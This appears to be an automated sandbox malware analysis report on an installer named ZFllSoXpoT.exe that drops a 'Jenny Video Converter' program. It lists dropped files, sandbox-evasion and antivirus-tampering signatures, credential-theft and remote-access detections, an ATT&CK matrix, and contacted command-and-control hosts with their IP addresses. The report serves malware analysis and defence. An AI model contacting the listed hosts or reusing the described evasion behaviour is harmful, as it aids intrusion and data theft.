        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-SKU3B.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-CJ5EH.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpng16-16.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-LKHV4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\is-GTTMJ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-RSP19.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-K6ASR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-546FI.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-A3JAA.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-2700D.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-PC21V.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-KPRR4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-JNPGG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-GVVRD.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-4NH58.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-802JP.tmpJump to dropped file
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5693
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe TID: 6096Thread sleep count: 220 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe TID: 6096Thread sleep time: -440000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe TID: 2092Thread sleep count: 66 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe TID: 2092Thread sleep time: -3960000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe TID: 6096Thread sleep count: 9642 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe TID: 6096Thread sleep time: -19284000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00452A4C FindFirstFileA,GetLastError,3_2_00452A4C
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,3_2_004751F8
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_00464048
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_004644C4
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,3_2_00462ABC
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,3_2_00497A74
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeThread delayed: delay time: 60000Jump to behavior
        Source: svchost.exe, 00000005.00000002.2563176990.0000026D00A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ."@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: jennyvideoconverter32.exe, 00000008.00000002.2562237741.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
        Source: svchost.exe, 00000005.00000002.2563238886.0000026D00A81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000005.00000002.2563176990.0000026D00A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stemRoo @\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a\
        Source: svchost.exe, 00000005.00000002.2563176990.0000026D00A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: svchost.exe, 00000005.00000002.2563176990.0000026D00A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}co
        Source: jennyvideoconverter32.exe, 00000008.00000002.2562237741.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, jennyvideoconverter32.exe, 00000008.00000002.2562237741.0000000000BAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: svchost.exe, 00000005.00000002.2562065089.0000026D00A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
        Source: svchost.exe, 00000005.00000002.2563620579.0000026D00B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000002.00000002.2561958880.0000027B4E82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeAPI call chain: ExitProcess graph end nodegraph_0-6733
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E400FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,8_2_02E400FE
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E400FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,8_2_02E400FE
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004502AC
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E2648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,8_2_02E2648B
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E39468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02E39468
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,3_2_00478420
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,3_2_0042E0AC
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E37FAD cpuid 8_2_02E37FAD
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: GetLocaleInfoA,0_2_004051FC
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: GetLocaleInfoA,0_2_00405248
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: GetLocaleInfoA,3_2_00408570
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: GetLocaleInfoA,3_2_004085BC
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0045892C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,3_2_0045892C
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00455588 GetUserNameA,3_2_00455588
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
        Source: svchost.exe, 00000006.00000002.2563478005.000001C988702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
        Source: svchost.exe, 00000006.00000002.2563478005.000001C988702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2564448178.0000000002D75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: jennyvideoconverter32.exe PID: 5936, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2564448178.0000000002D75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: jennyvideoconverter32.exe PID: 5936, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        Exploitation for Privilege Escalation
        1
        Disable or Modify Tools
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Native API
        14
        Windows Service
        1
        DLL Side-Loading
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Service Execution
        1
        Bootkit
        1
        Access Token Manipulation
        2
        Obfuscated Files or Information
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook14
        Windows Service
        21
        Software Packing
        NTDS46
        System Information Discovery
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
        Process Injection
        1
        Timestomp
        LSA Secrets171
        Security Software Discovery
        SSHKeylogging112
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials1
        Process Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Masquerading
        DCSync131
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
        Virtualization/Sandbox Evasion
        Proc Filesystem11
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Access Token Manipulation
        /etc/passwd and /etc/shadow3
        System Owner/User Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
        Process Injection
        Network Sniffing1
        Remote System Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
        Bootkit
        Input Capture1
        System Network Configuration Discovery
        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527966 Sample: ZFllSoXpoT.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 41 time.windows.com 2->41 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Antivirus / Scanner detection for submitted sample 2->51 53 8 other signatures 2->53 8 ZFllSoXpoT.exe 2 2->8         started        11 svchost.exe 2->11         started        14 svchost.exe 1 2->14         started        16 4 other processes 2->16 signatures3 process4 file5 37 C:\Users\user\AppData\...\ZFllSoXpoT.tmp, PE32 8->37 dropped 18 ZFllSoXpoT.tmp 18 38 8->18         started        55 Changes security center settings (notifications, updates, antivirus, firewall) 11->55 21 MpCmdRun.exe 2 11->21         started        57 Query firmware table information (likely to detect VMs) 14->57 signatures6 process7 file8 29 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 18->29 dropped 31 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 18->31 dropped 33 C:\Users\user\AppData\Local\...\_RegDLL.tmp, PE32 18->33 dropped 35 58 other files (43 malicious) 18->35 dropped 23 jennyvideoconverter32.exe 1 19 18->23         started        27 conhost.exe 21->27         started        process9 dnsIp10 43 csnzndu.net 185.208.158.248, 49971, 49973, 49975 SIMPLECARRER2IT Switzerland 23->43 45 89.105.201.183, 2023, 49972, 49974 NOVOSERVE-ASNL Netherlands 23->45 39 C:\...T Ammeter Side 10.7.46.exe, PE32 23->39 dropped file11

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        ZFllSoXpoT.exe100%AviraHEUR/AGEN.1332570
        SourceDetectionScannerLabelLink
        C:\ProgramData\ET Ammeter Side 10.7.46\ET Ammeter Side 10.7.46.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Jenny Video Converter\is-1GTV3.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-2700D.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-4NH58.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-546FI.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-6D3ET.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-802JP.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-89P6A.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-A3JAA.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-C5452.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-CJ5EH.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-GVVRD.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-HU6GR.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-J93O6.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-JNPGG.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-K6ASR.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-K6NUN.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-K7E1C.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-K7K0E.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-KPRR4.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-LKHV4.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-OBUNB.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-PC21V.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-QGIC5.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-RSP19.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-SKU3B.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-UNA71.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-V1USB.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libgcc_s_dw2-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libgdk-win32-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libgdk_pixbuf-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libgdkmm-2.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libglibmm-2.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libgmodule-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libgobject-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libgomp-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libgraphite2.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libharfbuzz-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libintl-8.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libjpeg-8.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\liblcms2-2.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\liblzma-5.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libpango-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libpangocairo-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libpangoft2-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libpangomm-1.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libpangowin32-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libpcre-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libpixman-1-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libpng16-16.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\librsvg-2-2.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libsigc-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libtiff-5.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\libwinpthread-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\is-GTTMJ.tmp3%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\unins000.exe (copy)3%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\zlib1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_RegDLL.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_iscrypt.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_setup64.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_shfoldr.dll0%ReversingLabs
